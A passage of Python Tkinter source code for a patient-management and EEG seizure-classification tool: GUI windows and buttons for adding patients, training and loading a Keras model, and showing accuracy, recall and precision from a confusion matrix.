Button(self.frame_1,\n text=\"Add Patient\",\n font=(\"AvantGarde\", 20, \"bold\"),\n command=self.JanelaAddPaciente,\n bg=\"#14787A\",\n fg=\"#ffffff\",\n width=\"15\",\n height=\"1\",\n cursor=\"hand2\")\n self.Boton_add.place(relx=0.02,\n rely=0.4,\n relwidth=0.98,\n relheight=0.10)\n\n ## Criando botao novo\n self.Boton_open = Button(self.frame_1,\n text=\"Open Patient\",\n font=(\"AvantGarde\", 20, \"bold\"),\n command=self.JanelaShowPaciente,\n bg=\"#14787A\",\n fg=\"#ffffff\",\n width=\"15\",\n height=\"1\",\n cursor=\"hand2\")\n self.Boton_open.place(relx=0.02,\n rely=0.6,\n relwidth=0.98,\n relheight=0.10)\n\n ## Criando botao alterar\n self.Boton_close = Button(self.frame_1,\n text=\"Close\",\n font=(\"AvantGarde\", 20, \"bold\"),\n command=self.root.quit,\n bg=\"#14787A\",\n fg=\"#ffffff\",\n width=\"15\",\n height=\"1\",\n cursor=\"hand2\")\n self.Boton_close.place(relx=0.02,\n rely=0.8,\n relwidth=0.98,\n relheight=0.10)\n\n ################################# ADD PAT ###########################################\n def frames_de_telaAddPat(self):\n self.frame_1 = Frame(self.root2,\n bd=4,\n bg='#DFEBE9',\n highlightbackground='#759fe6',\n highlightthickness=3)\n self.frame_1.place(relx=0.02, rely=0.02, relwidth=0.96, relheight=0.46)\n\n self.frame_2 = Frame(self.root2, bd=4, bg='#DFEBE9')\n self.frame_2.place(relx=0.02, rely=0.5, relwidth=0.96, relheight=0.46)\n\n def widgets_frameAddPat(self):\n self.abas = ttk.Notebook(self.frame_1)\n self.aba1 = Frame(self.abas)\n self.aba2 = Frame(self.abas)\n\n self.aba1.configure(background='#DFEBE9')\n self.aba2.configure(background='#DFEBE9')\n\n self.abas.add(self.aba1, text=\" \")\n self.abas.add(self.aba2, text=\" \")\n\n self.abas.place(relx=0, rely=0, relwidth=0.98, relheight=0.98)\n\n self.canvas_bt = Canvas(self.aba1,\n bd=0,\n bg='#1e3743',\n highlightbackground='gray',\n highlightthickness=5)\n\n self.canvas_bt.place(relx=0.19,\n rely=0.08,\n relwidth=0.42,\n relheight=0.19)\n ## Criando botao limpar\n self.bt_lipar = Button(self.aba1,\n text=\"Clean\",\n bd=2,\n bg='#14787A',\n activebackground='#108ecb',\n activeforeground='white',\n fg='white',\n font=('verdana', 9, 'bold'),\n command=self.limpa_cliente)\n self.bt_lipar.place(relx=0.2, rely=0.1, relwidth=0.1, relheight=0.15)\n\n ## Criando botao buscar\n self.bt_buscar = Button(self.aba1,\n text=\"Search\",\n bd=2,\n bg='#14787A',\n activebackground='#108ecb',\n activeforeground='white',\n fg='white',\n font=('verdana', 9, 'bold'),\n command=self.busca_cliente)\n self.bt_buscar.place(relx=0.3, rely=0.1, relwidth=0.1, relheight=0.15)\n\n texto_balao_buscar = \"Type in the info field the patient you want to search\"\n self.balao_buscar = tix.Balloon(self.aba1)\n self.balao_buscar.bind_widget(self.bt_buscar,\n balloonmsg=texto_balao_buscar)\n\n ## Criando botao apagar\n self.bt_apagar = Button(self.aba1,\n text=\"Delete\",\n bd=2,\n bg='#14787A',\n activebackground='#108ecb',\n activeforeground='white',\n fg='white',\n font=('verdana', 9, 'bold'),\n command=self.deleta_cliente)\n self.bt_apagar.place(relx=0.4, rely=0.1, relwidth=0.1, relheight=0.15)\n\n ## Criando botao alterar\n self.bt_alterar = Button(self.aba1,\n text=\"Change\",\n bd=2,\n bg='#14787A',\n activebackground='#108ecb',\n activeforeground='white',\n fg='white',\n font=('verdana', 9, 'bold'),\n command=self.alterar_cliente)\n self.bt_alterar.place(relx=0.5, rely=0.1, relwidth=0.1, relheight=0.15)\n\n ## Botão Classificação\n # Deve abrir uma opção para escrever qual o modelo que deseja usar para realizar a classificação\n #\n #\n #\n self.bt_novo = Button(self.aba1,\n text=\"Classification\",\n bd=2,\n bg='#1e3743',\n activebackground='#108ecb',\n activeforeground='white',\n fg='white',\n font=('verdana', 11, 'bold'),\n command=self.JanelaClassificacaoSetup)\n self.bt_novo.place(relx=0.68, rely=0.1, relwidth=0.3, relheight=0.15)\n\n ## Botão Predicitions\n # Deve demonstrar o que queremos ver dos dados\n #\n #\n\n self.bt_novo2 = Button(self.aba1,\n text=\"Predictions\",\n bd=2,\n bg='#1e3743',\n activebackground='#108ecb',\n activeforeground='white',\n fg='white',\n font=('verdana', 11, 'bold'),\n command=self.JanelaPredictionSetup)\n self.bt_novo2.place(relx=0.68, rely=0.25, relwidth=0.3, relheight=0.15)\n\n ## Botão Treino\n # Deve avisar se deseja executar um treino com um modelo já existente ou se irá criar um novo modelo\n #\n #\n\n self.bt_novo2 = Button(self.aba1,\n text=\"Train\",\n bd=2,\n bg='#1e3743',\n activebackground='#108ecb',\n activeforeground='white',\n fg='white',\n font=('verdana', 11, 'bold'),\n command=self.JanelaTreinamento)\n self.bt_novo2.place(relx=0.68, rely=0.40, relwidth=0.3, relheight=0.15)\n\n ## Criando botao Treinamento\n #self.bt_treinamento = Button(self.aba1, text=\"Classify\", bd=2, bg='#00FFFF',\n # activebackground='yellow', activeforeground='black',fg = 'black',\n # font = ('verdana',9,'bold'), command=self.JanelaClassificacao)\n #self.bt_treinamento.place(relx=0.5, rely=0.1, relwidth=0.1,relheight=0.15)\n\n ## Criando botao files\n self.bt_files = Button(self.aba1,\n text=\"Files\",\n bd=2,\n font=('verdana', 9, 'bold'),\n command=lambda: self.buscar_arquivos())\n self.bt_files.place(relx=0.5, rely=0.43, relwidth=0.1, relheight=0.15)\n\n ## Criação da label e entrada de código\n self.lb_codigo = Label(self.aba1,\n text=\"Code\",\n bg=\"#DFEBE9\",\n fg='#107db2')\n self.lb_codigo.place(relx=0.05, rely=0.05)\n\n self.codigo_entry = Entry(self.aba1)\n self.codigo_entry.place(relx=0.05, rely=0.15, relwidth=0.08)\n\n ## Criação da label e entrada da age -\n self.lb_idade = Label(self.aba1,\n text=\"Age :\",\n bg=\"#DFEBE9\",\n fg='#107db2')\n self.age_entry = Entry(self.aba1)\n self.lb_idade.place(relx=0.05, rely=0.3)\n self.age_entry.place(relx=0.05, rely=0.45, relwidth=0.2)\n\n ## Criação da label e entrada da genero\n self.lb_genero = Label(self.aba1,\n text=\"Gender :\",\n bg=\"#DFEBE9\",\n fg='#107db2')\n self.lb_genero.place(relx=0.05, rely=0.68)\n\n self.Tipvar = StringVar()\n self.TipV = ('Male', 'Woman')\n self.Tipvar.set(\"Male\")\n self.popupMenu = OptionMenu(self.aba1, self.Tipvar, *self.TipV)\n self.popupMenu.place(relx=0.05, rely=0.80, relwidth=0.3)\n self.gender_entry = self.Tipvar.get()\n\n ## Criação da label e entrada da File\n self.lb_files = Label(self.aba1,\n text=\"Files :\",\n bg=\"#DFEBE9\",\n fg='#107db2')\n self.lb_files.place(relx=0.5, rely=0.3)\n\n ## Criação da label e entrada da Info\n self.lb_info = Label(self.aba1,\n text=\"Info :\",\n bg=\"#DFEBE9\",\n fg='#107db2')\n self.lb_info.place(relx=0.5, rely=0.6)\n self.info_entry = Entry(self.aba1)\n self.info_entry.place(relx=0.5, rely=0.75, relwidth=0.4)\n\n def lista_frame2(self):\n self.listaCli = ttk.Treeview(self.frame_2,\n height=3,\n column=(\"col1\", \"col2\", \"col3\", \"col4\",\n \"col5\", \"col6\", \"col7\", \"col8\"))\n self.listaCli.heading(\"#0\", text=\"\")\n self.listaCli.heading(\"#1\", text=\"Cod\")\n self.listaCli.heading(\"#2\", text=\"Age\")\n self.listaCli.heading(\"#3\", text=\"Gender\")\n self.listaCli.heading(\"#4\", text=\"Info\")\n self.listaCli.heading(\"#5\", text=\"Accur.\")\n self.listaCli.heading(\"#6\", text=\"Recall\")\n self.listaCli.heading(\"#7\", text=\"Precision\")\n self.listaCli.heading(\"#8\", text=\"File\")\n\n self.listaCli.column(\"#0\", width=1)\n self.listaCli.column(\"#1\", width=40)\n self.listaCli.column(\"#2\", width=40)\n self.listaCli.column(\"#3\", width=70)\n self.listaCli.column(\"#4\", width=120)\n self.listaCli.column(\"#5\", width=50)\n self.listaCli.column(\"#6\", width=50)\n self.listaCli.column(\"#7\", width=50)\n self.listaCli.column(\"#8\", width=150)\n\n self.listaCli.place(relx=0.01, rely=0.1, relwidth=0.95, relheight=0.85)\n\n self.scroolLista = Scrollbar(self.frame_2, orient='vertical')\n self.listaCli.configure(yscroll=self.scroolLista.set)\n self.scroolLista.place(relx=0.96,\n rely=0.1,\n relwidth=0.04,\n relheight=0.85)\n self.listaCli.bind(\"\", self.OnDoubleClick)\n\n def Menus(self):\n menubar = Menu(self.root2)\n self.root2.config(menu=menubar)\n filemenu = Menu(menubar)\n filemenu2 = Menu(menubar)\n\n def Quit():\n self.root2.destroy()\n\n menubar.add_cascade(label=\"Options\", menu=filemenu)\n menubar.add_cascade(label=\"Reports\", menu=filemenu2)\n filemenu.add_command(label=\"exit\", command=Quit)\n filemenu2.add_command(label=\"Clean\", command=self.limpa_cliente)\n filemenu2.add_command(label=\"Customer File\",\n command=self.gerarRelatorioCliente)\n\n def tela2(self):\n self.root2.title(\"Add Patient\")\n self.root2.config(bg=\"#DFEBE9\")\n self.root2.geometry(\"1024x768\")\n self.root2.resizable(True, True)\n self.root2.maxsize(width=900, height=700)\n self.root2.minsize(width=500, height=400)\n self.root2.transient(self.root)\n self.root2.focus_force()\n self.root2.grab_set()\n\n def JanelaAddPaciente(self):\n self.root2 = Toplevel()\n self.tela2()\n self.frames_de_telaAddPat()\n self.widgets_frameAddPat()\n self.lista_frame2()\n self.select_lista()\n self.Menus()\n\n ################################################ TELA TreinamentoSetup\n\n def tela10(self):\n self.root6.title(\"Train\")\n self.root6.config(bg=\"#DFEBE9\")\n self.root6.geometry(\"1024x768\")\n self.root6.resizable(True, True)\n self.root6.maxsize(width=300, height=300)\n self.root6.minsize(width=300, height=300)\n self.root6.transient(self.root2)\n self.root6.focus_force()\n self.root6.grab_set()\n\n def TelaTreino(self):\n\n canvasroot6 = Canvas(self.root6,\n width=1000,\n height=700,\n relief='raised',\n bg=\"#DFEBE9\")\n canvasroot6.pack()\n\n def Validar():\n self.TreinamentoOcorrendo()\n time.sleep(200)\n self.TreinamentoModelo()\n print(\"Treinou\")\n\n #Imagens logs=os\n width = 500\n height = 200\n\n # Title\n label2 = Label(self.root6,\n text=\"\"\"Select whether you want to create a new model \n or use one that actually exists:\"\"\")\n label2.config(font=('helvetica', 9), bg=\"#DFEBE9\")\n canvasroot6.create_window(100, 20, window=label2)\n\n ## Criação da label e entrada do tipo\n self.lb_type = Label(self.root6,\n text=\"Model :\",\n bg=\"#DFEBE9\",\n fg='#107db2')\n self.lb_type.place(relx=0.05, rely=0.2)\n self.Tipvar = StringVar()\n self.TipV = ('New Model', 'Old Model')\n self.Tipvar.set(\"New Model\")\n self.popupMenu = OptionMenu(self.root6, self.Tipvar, *self.TipV)\n self.popupMenu.place(relx=0.05, rely=0.3, relwidth=0.5)\n self.model_type_entry = self.Tipvar.get()\n\n ## Criasção da label e entrada do tipo\n self.lb_name = Label(self.root6,\n text=\"Chose model name:\",\n bg=\"#DFEBE9\",\n fg='#107db2')\n self.lb_name.place(relx=0.05, rely=0.45)\n self.new_model_name = Entry(self.root6)\n self.new_model_name.place(relx=0.05, rely=0.55, relwidth=0.5)\n\n ## Criasção da label e entrada do tipo\n self.lb_model = Label(self.root6,\n text=\"Select the file for train (namefile[0]):\",\n bg=\"#DFEBE9\",\n fg='#107db2')\n self.lb_model.place(relx=0.05, rely=0.65)\n self.bt_files = Button(self.root6,\n text=\"Files\",\n bd=2,\n font=('verdana', 9, 'bold'),\n command=lambda: self.buscar_arquivo2())\n self.bt_files.place(relx=0.05, rely=0.75, relwidth=0.5, relheight=0.1)\n\n ## Criação da label e entrada do tipo\n\n self.Boton_done = Button(self.root6,\n text=\"Done\",\n font=(\"AvantGarde\", 9, \"bold\"),\n command=Validar,\n bg=\"#14787A\",\n fg=\"#ffffff\",\n width=\"15\",\n height=\"1\",\n cursor=\"hand2\")\n self.Boton_done.place(relx=0.70,\n rely=0.8,\n relwidth=0.20,\n relheight=0.10)\n\n def JanelaTreinamento(self):\n self.root6 = Toplevel()\n self.tela10()\n self.TelaTreino()\n\n ################################################ TELA ClassficacaoSetup\n\n def tela11(self):\n self.root7.title(\"Classification\")\n self.root7.config(bg=\"#DFEBE9\")\n self.root7.geometry(\"1024x768\")\n self.root7.resizable(True, True)\n self.root7.maxsize(width=300, height=300)\n self.root7.minsize(width=300, height=300)\n self.root7.transient(self.root2)\n self.root7.focus_force()\n self.root7.grab_set()\n\n def TelaClassificacao(self):\n canvasroot7 = Canvas(self.root7,\n width=1000,\n height=700,\n relief='raised',\n bg=\"#DFEBE9\")\n canvasroot7.pack()\n\n def Classificando():\n self.JanelaClassificacao()\n print(\"ACCURACY ENTRY: \" + self.accuracy_entry)\n print(\"RECALL ENTRY: \" + self.recall_entry)\n print(\"PRECISION ENTRY: \" + self.precision_entry)\n self.accuracy_entry = self.accurancyValue_Entry\n self.recall_entry = self.recallValue_Entry\n self.precision_entry = self.precisionValue_Entry\n print(\"ACCURACY ENTRY: \" + self.accuracy_entry)\n print(\"RECALL ENTRY: \" + self.recall_entry)\n print(\"PRECISION ENTRY: \" + self.precision_entry)\n print(\"Add Cliente\")\n self.add_cliente()\n print(\"Finalizou Treino e salvou cliente\")\n\n #Imagens logs=os\n width = 500\n height = 200\n\n # Title\n label2 = Label(\n self.root7,\n text=\"\"\"Choose a pre-existing model to classify your data.\n If you wanted to create a new model , go back and \n select the Training option\"\"\")\n label2.config(font=('helvetica', 9), bg=\"#DFEBE9\")\n canvasroot7.create_window(145, 40, window=label2)\n\n ## Criasção da label e entrada do tipo\n self.lb_name = Label(self.root7,\n text=\"Select Model Name\",\n bg=\"#DFEBE9\",\n fg='#107db2')\n self.lb_name.place(relx=0.05, rely=0.25)\n self.existed_model_name = Entry(self.root7)\n self.existed_model_name.place(relx=0.05, rely=0.35, relwidth=0.5)\n\n ## Botão de Seleção dos Arquivos para Classificação\n\n ## Criação da label e entrada do tipo\n\n self.Boton_done = Button(self.root7,\n text=\"Done\",\n font=(\"AvantGarde\", 9, \"bold\"),\n command=Classificando,\n bg=\"#14787A\",\n fg=\"#ffffff\",\n width=\"15\",\n height=\"1\",\n cursor=\"hand2\")\n self.Boton_done.place(relx=0.70,\n rely=0.8,\n relwidth=0.20,\n relheight=0.10)\n\n def JanelaClassificacaoSetup(self):\n self.root7 = Toplevel()\n self.tela11()\n self.TelaClassificacao()\n\n ################################################ TELA ClassficacaoSetup\n\n def tela13(self):\n self.root10.title(\"Prediction\")\n self.root10.config(bg=\"#DFEBE9\")\n self.root10.geometry(\"1024x768\")\n self.root10.resizable(True, True)\n self.root10.maxsize(width=300, height=300)\n self.root10.minsize(width=300, height=300)\n self.root10.transient(self.root2)\n self.root10.focus_force()\n self.root10.grab_set()\n\n def TelaPrediction(self):\n canvasroot10 = Canvas(self.root10,\n width=1000,\n height=700,\n relief='raised',\n bg=\"#DFEBE9\")\n canvasroot10.pack()\n\n def Prediction():\n self.JanelaPrediction()\n print(\"ACCURACY ENTRY: \" + self.accuracy_entry)\n print(\"RECALL ENTRY: \" + self.recall_entry)\n print(\"PRECISION ENTRY: \" + self.precision_entry)\n self.accuracy_entry = self.accurancyValue_Entry\n self.recall_entry = self.recallValue_Entry\n self.precision_entry = self.precisionValue_Entry\n print(\"ACCURACY ENTRY: \" + self.accuracy_entry)\n print(\"RECALL ENTRY: \" + self.recall_entry)\n print(\"PRECISION ENTRY: \" + self.precision_entry)\n print(\"Add Cliente\")\n self.add_cliente()\n print(\"Finalizou Treino e salvou cliente\")\n\n #Imagens logs=os\n width = 500\n height = 200\n\n # Title\n label2 = Label(\n self.root10,\n text=\"\"\"Choose a pre-existing model to pretict your data.\n If you wanted to create a new model , go back and \n select the Training option\"\"\")\n label2.config(font=('helvetica', 9), bg=\"#DFEBE9\")\n canvasroot10.create_window(145, 40, window=label2)\n\n ## Criasção da label e entrada do tipo\n self.lb_name = Label(self.root10,\n text=\"Select Model Name\",\n bg=\"#DFEBE9\",\n fg='#107db2')\n self.lb_name.place(relx=0.05, rely=0.25)\n self.existed_model_name = Entry(self.root10)\n self.existed_model_name.place(relx=0.05, rely=0.35, relwidth=0.5)\n\n ## Botão de Seleção dos Arquivos para Classificação\n\n ## Criação da label e entrada do tipo\n\n self.Boton_done = Button(self.root10,\n text=\"Done\",\n font=(\"AvantGarde\", 9, \"bold\"),\n command=Prediction,\n bg=\"#14787A\",\n fg=\"#ffffff\",\n width=\"15\",\n height=\"1\",\n cursor=\"hand2\")\n self.Boton_done.place(relx=0.70,\n rely=0.8,\n relwidth=0.20,\n relheight=0.10)\n\n def JanelaPredictionSetup(self):\n self.root10 = Toplevel()\n self.tela13()\n self.TelaPrediction()\n\n ############################################### ABOUT\n def tela3(self):\n self.root3.title(\"About\")\n self.root3.config(bg=\"#DFEBE9\")\n self.root3.geometry(\"1024x768\")\n self.root3.resizable(0, 0)\n self.root3.transient(self.root)\n self.root3.focus_force()\n self.root3.grab_set()\n\n def Tela(self):\n canvasroot3 = Canvas(self.root3,\n width=1000,\n height=700,\n relief='raised',\n bg=\"#DFEBE9\")\n canvasroot3.pack()\n\n self.Boton_close = Button(self.root3,\n text=\"Close\",\n font=(\"AvantGarde\", 20, \"bold\"),\n command=self.root3.destroy,\n bg=\"#14787A\",\n fg=\"#ffffff\",\n width=\"15\",\n height=\"1\",\n cursor=\"hand2\")\n self.Boton_close.place(relx=0.70,\n rely=0.8,\n relwidth=0.20,\n relheight=0.10)\n\n #Imagens logs=os\n width = 400\n height = 400\n\n # IMAGEM 1\n img = Image.open(\"logos/logos_unidas.png\")\n img = img.resize((width, height), Image.ANTIALIAS)\n self.accurancy = ImageTk.PhotoImage(img)\n canvasroot3.imageList = []\n canvasroot3.pack()\n #canvasroot3.create_image(1055, 300, anchor=\"e\", image=self.accurancy)\n canvasroot3.create_image(1020, 300, anchor=\"e\", image=self.accurancy)\n canvasroot3.imageList.append(self.accurancy)\n\n # About\n label2 = Label(self.root3, text=\"About the porject:\")\n label2.config(font=('helvetica', 14), bg=\"#DFEBE9\")\n canvasroot3.create_window(180, 100, window=label2)\n\n #about text in image\n width = 600\n height = 600\n img4 = Image.open(\"logos/about.png\")\n img4 = img4.resize((width, height), Image.ANTIALIAS)\n\n self.accurancy4 = ImageTk.PhotoImage(img4)\n canvasroot3.imageList = []\n canvasroot3.pack()\n canvasroot3.create_image(670, 380, anchor=\"e\", image=self.accurancy4)\n canvasroot3.imageList.append(self.accurancy4)\n\n def JanelaAbout(self):\n self.root3 = Toplevel()\n self.tela3()\n self.Tela()\n\n ############################################### SHOW PAT\n def frames_de_telaShowPat(self):\n self.frame_1 = Frame(self.root4,\n bd=4,\n bg='#DFEBE9',\n highlightbackground='#759fe6',\n highlightthickness=3)\n self.frame_1.place(relx=0.02, rely=0.02, relwidth=0.96, relheight=0.25)\n\n self.frame_2 = Frame(self.root4, bd=4, bg='#DFEBE9')\n self.frame_2.place(relx=0.02, rely=0.3, relwidth=0.96, relheight=0.65)\n\n def widgets_frameShowPat(self):\n self.abas = ttk.Notebook(self.frame_1)\n self.aba1 = Frame(self.abas)\n self.aba2 = Frame(self.abas)\n\n self.aba1.configure(background='#DFEBE9')\n self.aba2.configure(background=\"lightgray\")\n\n self.abas.add(self.aba1, text=\" \")\n self.abas.add(self.aba2, text=\" \")\n\n self.abas.place(relx=0, rely=0, relwidth=0.98, relheight=0.98)\n\n self.codigo_entry = Entry(self.aba1)\n self.Tipvar1 = StringVar()\n self.Tipvar1.set(\"Child: 0-18\")\n self.age_entry = self.Tipvar1.get()\n\n self.info_entry = Entry(self.aba1)\n\n self.Tipvar = StringVar()\n self.Tipvar.set(\"Male\")\n self.gender_entry = self.Tipvar.get()\n\n self.canvas_bt = Canvas(self.aba1,\n bd=0,\n bg='#1e3743',\n highlightbackground='gray',\n highlightthickness=5)\n\n self.canvas_bt.place(relx=0.19,\n rely=0.2,\n relwidth=0.32,\n relheight=0.40)\n ## Criando botao limpar bg=\"#14787A\", fg=\"#ffffff\"\n self.bt_lipar = Button(self.aba1,\n text=\"Clean\",\n bd=2,\n bg=\"#14787A\",\n activebackground='#108ecb',\n activeforeground='white',\n fg=\"#ffffff\",\n font=('verdana', 9, 'bold'),\n command=self.limpa_cliente)\n self.bt_lipar.place(relx=0.2, rely=0.24, relwidth=0.1, relheight=0.30)\n\n ## Criando botao buscar\n self.bt_buscar = Button(self.aba1,\n text=\"Search\",\n bd=2,\n bg=\"#14787A\",\n activebackground='#108ecb',\n activeforeground='white',\n fg=\"#ffffff\",\n font=('verdana', 9, 'bold'),\n command=self.busca_cliente)\n self.bt_buscar.place(relx=0.3, rely=0.24, relwidth=0.1, relheight=0.30)\n\n texto_balao_buscar = \"Type in the code field the patient you want to search\"\n self.balao_buscar = tix.Balloon(self.aba1)\n self.balao_buscar.bind_widget(self.bt_buscar,\n balloonmsg=texto_balao_buscar)\n\n ## Criando botao apagar\n self.bt_apagar = Button(self.aba1,\n text=\"Delete\",\n bd=2,\n bg='#14787A',\n activebackground='#108ecb',\n activeforeground='white',\n fg='white',\n font=('verdana', 9, 'bold'),\n command=self.deleta_cliente)\n self.bt_apagar.place(relx=0.4, rely=0.24, relwidth=0.1, relheight=0.30)\n\n ## Criação da label e entrada de código\n self.lb_codigo = Label(self.aba1,\n text=\"Code\",\n bg=\"#DFEBE9\",\n fg='#107db2')\n self.lb_codigo.place(relx=0.05, rely=0.10)\n\n self.codigo_entry = Entry(self.aba1)\n self.codigo_entry.place(relx=0.05, rely=0.30, relwidth=0.08)\n\n def lista_frame4(self):\n self.listaCli = ttk.Treeview(self.frame_2,\n height=3,\n column=(\"col1\", \"col2\", \"col3\", \"col4\",\n \"col5\", \"col6\", \"col7\", \"col8\"))\n self.listaCli.heading(\"#0\", text=\"\")\n self.listaCli.heading(\"#1\", text=\"Cod\")\n self.listaCli.heading(\"#2\", text=\"Age\")\n self.listaCli.heading(\"#3\", text=\"Gender\")\n self.listaCli.heading(\"#4\", text=\"Info\")\n self.listaCli.heading(\"#5\", text=\"Accur.\")\n self.listaCli.heading(\"#6\", text=\"Recall\")\n self.listaCli.heading(\"#7\", text=\"Precision\")\n self.listaCli.heading(\"#8\", text=\"File\")\n\n self.listaCli.column(\"#0\", width=1)\n self.listaCli.column(\"#1\", width=40)\n self.listaCli.column(\"#2\", width=40)\n self.listaCli.column(\"#3\", width=70)\n self.listaCli.column(\"#4\", width=120)\n self.listaCli.column(\"#5\", width=50)\n self.listaCli.column(\"#6\", width=50)\n self.listaCli.column(\"#7\", width=50)\n self.listaCli.column(\"#8\", width=150)\n\n self.listaCli.place(relx=0.01, rely=0.1, relwidth=0.95, relheight=0.85)\n\n self.scroolLista = Scrollbar(self.frame_2, orient='vertical')\n self.listaCli.configure(yscroll=self.scroolLista.set)\n self.scroolLista.place(relx=0.96,\n rely=0.1,\n relwidth=0.04,\n relheight=0.85)\n self.listaCli.bind(\"\", self.OnDoubleClick)\n\n def MenusShowPaciente(self):\n menubar = Menu(self.root4)\n self.root4.config(menu=menubar)\n filemenu = Menu(menubar)\n filemenu2 = Menu(menubar)\n filemenu = Menu(menubar)\n\n def Quit():\n self.root4.destroy()\n\n menubar.add_cascade(label=\"Options\", menu=filemenu)\n menubar.add_cascade(label=\"Reports\", menu=filemenu2)\n filemenu.add_command(label=\"exit\", command=Quit)\n filemenu2.add_command(label=\"Clean\", command=self.limpa_cliente)\n filemenu2.add_command(label=\"Customer File\",\n command=self.gerarRelatorioCliente)\n\n def tela4(self):\n self.root4.title(\"Show\")\n self.root4.config(bg=\"#DFEBE9\")\n self.root4.geometry(\"1024x768\")\n self.root4.resizable(True, True)\n self.root4.maxsize(width=900, height=700)\n self.root4.minsize(width=500, height=400)\n self.root4.transient(self.root)\n self.root4.focus_force()\n self.root4.grab_set()\n\n def JanelaShowPaciente(self):\n self.root4 = Toplevel()\n self.tela4()\n self.frames_de_telaShowPat()\n self.widgets_frameShowPat()\n self.lista_frame4()\n self.select_lista()\n self.MenusShowPaciente()\n\n # JANELA DA CLASSIFICACAO\n def frames_de_telaClassification(self):\n self.frame_1 = Frame(self.root5, bd=4, bg='#DFEBE9')\n self.frame_1.place(relx=0.70, rely=0.02, relwidth=0.27, relheight=0.80)\n\n def MenusClassification(self):\n menubar = Menu(self.root5)\n self.root5.config(menu=menubar)\n filemenu = Menu(menubar)\n filemenu2 = Menu(menubar)\n\n def Quit():\n self.root5.destroy()\n\n menubar.add_cascade(label=\"Options\", menu=filemenu)\n menubar.add_cascade(label=\"Reports\", menu=filemenu2)\n filemenu.add_command(label=\"exit\", command=Quit)\n filemenu2.add_command(label=\"Clean\", command=self.limpa_cliente)\n filemenu2.add_command(label=\"Customer File\",\n command=self.gerarRelatorioCliente)\n\n def tela5(self):\n self.root5.title(\"Classification\")\n self.root5.config(bg=\"#DFEBE9\")\n self.root5.geometry(\"1024x768\")\n self.root5.resizable(True, True)\n self.root5.maxsize(width=900, height=700)\n self.root5.minsize(width=500, height=400)\n self.root5.transient(self.root2)\n self.root5.focus_force()\n self.root5.grab_set()\n\n def Classificacao(self):\n canvas4 = Canvas(self.root5,\n width=1000,\n height=500,\n relief='raised',\n bg=\"#DFEBE9\")\n canvas4.pack()\n # ------ Load the trained CNN model\n print(self.existed_model_name.get())\n network_name = self.existed_model_name.get()\n model = tf.keras.models.load_model(network_name)\n\n # ---- Load data files\n data = self.nomeArquivoEDF\n event = LeituraArquivos.LoadEvento(self.nomeArquivoTSE)\n # print(event)\n\n # --- read EEG data\n raw = mne.io.read_raw_edf(data, preload=True)\n raw.rename_channels(lambda s: s.strip(\".\"))\n #raw.set_montage(\"standard_1020\")\n #raw.set_eeg_reference(\"average\")\n print(raw) # print raw data\n print(raw.info) # print edf info\n\n # ---- sampling rate\n fs = raw.info['sfreq'] # sampling frequency\n duration = len(\n raw) / fs # recording duration of hole eeg data in seconds\n\n # ---- EEG data\n eeg = raw.get_data()\n\n # ---- Remove 60 Hz noise\n signal_filter = processing.butter_bandstop_filter(eeg, 59, 61, fs, 5)\n signal_filter = signal_filter[0:21, :] #Limit at 21 channels\n\n #------ Signal Bands\n delta_teta = processing.butter_bandpass_filter(signal_filter, 1, 7, fs,\n 5)\n alpha_beta = processing.butter_bandpass_filter(signal_filter, 8, 30,\n fs, 5)\n gamma = processing.butter_bandpass_filter(signal_filter, 31, 100, fs,\n 5)\n # ------ Applied STFT to signal bands\n f, t, Zxx_delta_teta = processing.STFT(delta_teta, fs)\n f, t, Zxx_alpha_beta = processing.STFT(alpha_beta, fs)\n f, t, Zxx_gamma = processing.STFT(gamma, fs)\n\n # ------- Create event vector 0 and 1\n event_vec = processing.EventVector(event, t)\n\n # ------- Cut first 1 minute\n Zxx_delta_teta = Zxx_delta_teta[60:, :, :]\n Zxx_alpha_beta = Zxx_alpha_beta[60:, :, :]\n Zxx_gamma = Zxx_gamma[60:, :, :]\n event_vec = event_vec[60:]\n\n # ------- Create the input network\n Zxx_size = Zxx_delta_teta.shape\n Input_net = np.zeros((Zxx_size[0], Zxx_size[1], Zxx_size[2], 3))\n Input_net[:, :, :, 0] = Zxx_delta_teta\n Input_net[:, :, :, 1] = Zxx_alpha_beta\n Input_net[:, :, :, 2] = Zxx_gamma\n\n # -------- Classify events\n cm, predictions, precision, recall, f_score = network.classify(\n model, Input_net, event_vec)\n cm_plot_labels = [\"Seizure-free\", \"Seizure\"]\n network.plot_confusion_matrix(cm,\n cm_plot_labels,\n title=\"Confusion Matrix\")\n\n plt.savefig('Resultado.png')\n\n TP = cm[1][1]\n TN = cm[0][0]\n FN = cm[1][0]\n FP = cm[0][1]\n\n #plots.plot_predict(t, event_vec, predictions)\n # -------- metrics\n accuracy = (TP + TN) / (TP + FP + TN + FN) * 100\n formatted_accuracy = \"{:.2f}\".format(accuracy)\n accuracy = formatted_accuracy\n\n recall = TP / (TP + FN) * 100 #also know as recall\n specificity = TN / (TN + FP) * 100\n precision = TP / (TP + FP) * 100\n error = (FP + FN) / (TP + FP + TN + FN)\n #F1 = 2 * (precision * recall) / (precision + recall)\n print(\"acc: \", accuracy)\n print(\"recall:\", recall)\n print(\"precision:\", precision)\n print('F1-score:', f_score)\n #\n #print(\"spec:\", specificity)\n print(\"error:\", error)\n\n Resultado = \"Resultado.png\"\n width = 600\n height = 400\n img = Image.open(Resultado)\n img = img.resize((width, height), Image.ANTIALIAS)\n self.accurancy = ImageTk.PhotoImage(img)\n canvas4.imageList = []\n canvas4.pack()\n canvas4.create_image(200, 230, anchor=\"w\", image=self.accurancy)\n canvas4.imageList.append(self.accurancy)\n\n label2 = Label(self.root5, text='accurancy:')\n label2.config(font=(\"AvantGarde\", 18, \"bold\"),\n fg=\"#14787A\",\n bg=\"#DFEBE9\")\n canvas4.create_window(100, 100, window=label2)\n label4 = Label(self.root5, text=accuracy)\n self.accurancyValue_Entry = accuracy\n formatted_recall = \"{:.2f}\".format(recall)\n recall = formatted_recall\n formatted_precision = \"{:.2f}\".format(precision)\n precision = formatted_precision\n self.recallValue_Entry = formatted_recall\n self.precisionValue_Entry = formatted_precision * 100\n label4.config(font=(\"AvantGarde\", 14, \"bold\"), bg=\"#DFEBE9\")\n canvas4.create_window(100, 130, window=label4)\n\n label2 = Label(self.root5, text='recall:')\n label2.config(font=(\"AvantGarde\", 18, \"bold\"),\n fg=\"#14787A\",\n bg=\"#DFEBE9\")\n canvas4.create_window(100, 200, window=label2)\n label4 = Label(self.root5, text=recall)\n self.recallValue_Entry = recall\n label4.config(font=(\"AvantGarde\", 14, \"bold\"), bg=\"#DFEBE9\")\n canvas4.create_window(100, 230, window=label4)\n\n 